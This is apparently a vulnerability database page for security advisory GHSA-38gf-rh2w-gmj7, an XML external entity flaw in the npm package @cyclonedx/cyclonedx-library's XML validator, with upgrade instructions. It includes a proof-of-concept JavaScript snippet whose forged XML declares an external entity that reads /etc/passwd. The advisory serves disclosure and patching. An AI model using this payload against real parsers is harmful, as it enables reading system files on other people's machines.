VDB
Sign up
HIGH8.1

GHSA-38gf-rh2w-gmj7

@cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability

Quick fix

GHSA-38gf-rh2w-gmj7 — @cyclonedx/cyclonedx-library: upgrade to the fixed version with the command below.

npm install @cyclonedx/cyclonedx-library@6.7.1

Details

### Impact

XML External entity injections could be possible, when running the provided XML Validator on arbitrary input.

#### POC

```js const { Spec: { Version }, Validation: { XmlValidator } } = require('@cyclonedx/cyclonedx-library');

const version = Version.v1dot5; const validator = new XmlValidator(version); const input = `<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE poc [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <bom xmlns="http://cyclonedx.org/schema/bom/1.5"> <components> <component type="library"> <name>testing</name> <version>1.337</version> <licenses> <license> <id>&xxe;</id><!-- << XML external entity (XXE) injection --> </license> </licenses> </component> </components> </bom>`;

// validating this forged(^) input might lead to unintended behaviour // for the fact that the XML external entity would be taken into account. validator.validate(input).then(ve => { console.error('validation error', ve); }); ```

### Patches

This issue was fixed in `@cyclonedx/cyclonedx-library@6.7.1 `.

### Workarounds

Do not run the provided XML validator on untrusted inputs.

### References

* issue was introduced via <https://github.com/CycloneDX/cyclonedx-javascript-library/pull/1063>.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/@cyclonedx/cyclonedx-library
Introduced in: 6.7.0Fixed in: 6.7.1
Fixnpm install @cyclonedx/cyclonedx-library@6.7.1

References